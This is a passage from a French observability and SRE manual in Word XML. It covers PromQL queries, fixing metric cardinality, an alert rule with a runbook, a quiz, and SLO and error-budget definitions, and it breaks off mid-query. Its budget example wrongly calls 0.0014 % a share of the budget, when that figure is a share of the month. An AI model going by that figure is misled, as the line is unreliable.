        <w:t>Exercice 83.2 — Corriger une cardinalité</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Une métrique contient 40 000 séries.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Trouvez l'étiquette fautive.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Déplacez-la vers les journaux.</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la baisse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 83.3 — Rédiger une alerte</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Les utilisateurs subissent des erreurs depuis dix minutes.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Alertez sur le taux d'erreur.</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Ajoutez une durée.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Joignez un runbook.</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83.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t># Débit par route sur 5 minutes</w:t>
        <w:br/>
        <w:t>sum by (route) (rate(http_requests_total[5m]))</w:t>
        <w:br/>
        <w:br/>
        <w:t># Taux d'erreur global</w:t>
        <w:br/>
        <w:t>sum(rate(http_requests_total{status=~"5.."}[5m]))</w:t>
        <w:br/>
        <w:t xml:space="preserve">  / sum(rate(http_requests_total[5m]))</w:t>
        <w:br/>
        <w:br/>
        <w:t># p95 par route</w:t>
        <w:br/>
        <w:t>histogram_quantile(0.95,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  sum by (le, route) (rate(http_request_duration_seconds_bucket[5m])))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> exige un compteur et au moins deux points.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">L'agrégation par </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>le</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est obligatoire avant </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>histogram_quantile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 83.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t># Avant</w:t>
        <w:br/>
        <w:t>http_requests_total{route="/commande", commande_id="CMD-88213"} 1</w:t>
        <w:br/>
        <w:t># 40 000 séries, une par commande</w:t>
        <w:br/>
        <w:br/>
        <w:t># Après</w:t>
        <w:br/>
        <w:t>http_requests_total{route="/commande"} 1</w:t>
        <w:br/>
        <w:t># 1 série par route</w:t>
        <w:br/>
        <w:br/>
        <w:t># L'identifiant reste dans le journal et la trace</w:t>
        <w:br/>
        <w:t>{"route": "/commande", "commande_id": "CMD-88213", "trace_id": "..."}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Toute étiquette dont le cardinal est proportionnel au trafic est fautive.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le déplacement vers les journaux conserve la capacité d'investigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 83.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>- alert: TauxErreurEleve</w:t>
        <w:br/>
        <w:t xml:space="preserve">  expr: |</w:t>
        <w:br/>
        <w:t xml:space="preserve">    sum(rate(http_requests_total{status=~"5.."}[5m]))</w:t>
        <w:br/>
        <w:t xml:space="preserve">      / sum(rate(http_requests_total[5m])) &gt; 0.05</w:t>
        <w:br/>
        <w:t xml:space="preserve">  for: 10m</w:t>
        <w:br/>
        <w:t xml:space="preserve">  labels:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    severite: critique</w:t>
        <w:br/>
        <w:t xml:space="preserve">    equipe: boutique</w:t>
        <w:br/>
        <w:t xml:space="preserve">  annotations:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    resume: "Plus de 5 % d'erreurs depuis 10 minutes"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    runbook: "https://wiki/runbooks/boutique-erreurs"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> évite les déclenchements sur un pic isolé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le runbook transforme l'alerte en action, même à trois heures du matin.</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Quel signal est le moins coûteux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Journal</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Trace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Métrique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Tous identiques</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Pourquoi éviter les identifiants en étiquette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Ils sont illisibles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Ils explosent la cardinalité</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Ils sont trop longs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Ils sont chiffrés</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 mesure le p95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La moyenne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La valeur couvrant 95 % des observations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 maximum</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 minimum</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À quoi sert un identifiant de trace dans un journal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À chiffrer</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À corréler des événements entre services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À compresser</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À signer</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Quel anti-patron d'alerte est cité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Alerter sur un symptôme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Alerter sur une cause interne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Assigner un propriétaire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Joindre un runbook</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C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Une métrique est un agrégat périodique de quelques octets.</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Chaque valeur distincte crée une série temporelle.</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5 % des observations dépassent cette valeur.</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Il relie les lignes d'une même requête distribuée.</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Une cause interne peut n'avoir aucun impact utilisateur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>84. SRE : objectifs de fiabilité et gestion d'incident</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Décider combien de fiabilité suffit, mesurer l'écart et apprendre de chaque panne.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 30 · Niveau : Avancé · Prérequis : chapitre 83</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Définir un indicateur et un objectif de fiabilité.</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Calculer un budget d'erreur et l'utiliser pour décider.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Organiser une réponse à incident.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Conduire une analyse sans reproche.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Éviter les pièges des objectifs mal calibrés.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>84.1 Fiabilité mesurable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un indicateur de niveau de service (SLI) décrit une expérience utilisateur ; un objectif de niveau de service (SLO) fixe la valeur visée ; un accord de niveau de service (SLA) engage juridiquement, avec compensation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.322 — Quatre termes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49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Terme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="346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Définition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Exemple</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2496"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>SLI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3467"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Mesure de l'expérience</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95 % des requêtes &lt; 400 ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="249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SLO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="346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Cible interne</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99,9 % de disponibilité mensuelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2496"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>SLA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3467"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Engagement contractuel</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99,5 %, sinon avoir</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="249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Budget d'erreur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="346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Marge de manœuvre</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0,1 % = 43 min / mois</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BUDGET D'ERREUR</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Complément de l'objectif : pour 99,9 % sur 30 jours, le budget est de 0,1 %, soit environ 43 minutes d'indisponibilité. Il se consomme et se recharge.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un calcul simple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Calcul du budget mensuel</w:t>
        <w:br/>
        <w:t># 30 jours = 43 200 minutes</w:t>
        <w:br/>
        <w:t># 99,9 %  → 43,2 min</w:t>
        <w:br/>
        <w:t># 99,95 % → 21,6 min</w:t>
        <w:br/>
        <w:t># 99,0 %  → 432 min (7 h 12)</w:t>
        <w:br/>
        <w:br/>
        <w:t># Le budget se consomme par événement, pas seulement par panne totale</w:t>
        <w:br/>
        <w:t># 1 % d'erreurs pendant une heure sur 43 200 min de trafic</w:t>
        <w:br/>
        <w:t># = 0,01 × 60 / 43 200 = 0,0014 % du budget</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99,99 % N'EST PAS TOUJOURS UN OBJECTIF RAISONNABLE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Quatre neufs imposent une redondance, des procédures et une astreinte permanente. Si l'utilisateur ne distingue pas 99,9 % de 99,99 %, le second coûte beaucoup plus cher sans bénéfice perçu.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>84.2 Choisir un indicateur</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un bon indicateur est mesuré côté utilisateur, sur une fenêtre glissante, et correspond à ce qui compte réellement : une requête réussie et rapide.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2857500"/>
            <wp:docPr id="98" name="Picture 98"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f96.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId136"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2857500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.96 — Construire un indicateur</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.323 — Quatre indicateurs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63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Indicateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Formule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Piège</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2635"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Disponibilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Requêtes non 5xx / total</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Une erreur 200 peut être un échec</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="263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Latence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Requêtes &lt; seuil / total</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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La moyenne masque la queue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2635"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Freshness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Données à jour / total</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ignoré lors des incidents</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="263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Taux d'échec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Échecs / tentatives</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Ignore les abandons</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un indicateur mesuré · promql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Un indicateur explicite</w:t>
        <w:br/>
        <w:t># SLI : proportion de requêtes /panier réussies en moins de 400 ms</w:t>
        <w:br/>
        <w:t># SLO : 99,9 % sur une fenêtre glissante de 30 jours</w:t>
        <w:br/>
        <w:br/>
        <w:t># Expression PromQL</w:t>
        <w:br/>
        <w:t>(</w:t>
        <w:br/>
        <w:t>sum(rate(http_request_duration_seconds_bucket{route="/panier",le="0.4"}[5m]))</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - sum(rate(http_requests_total{route="/panier",status=~"5.."}[5m]))</w:t>
        <w:br/>
        <w:t>)</w:t>
        <w:br/>
        <w:t>/</w:t>
        <w:br/>
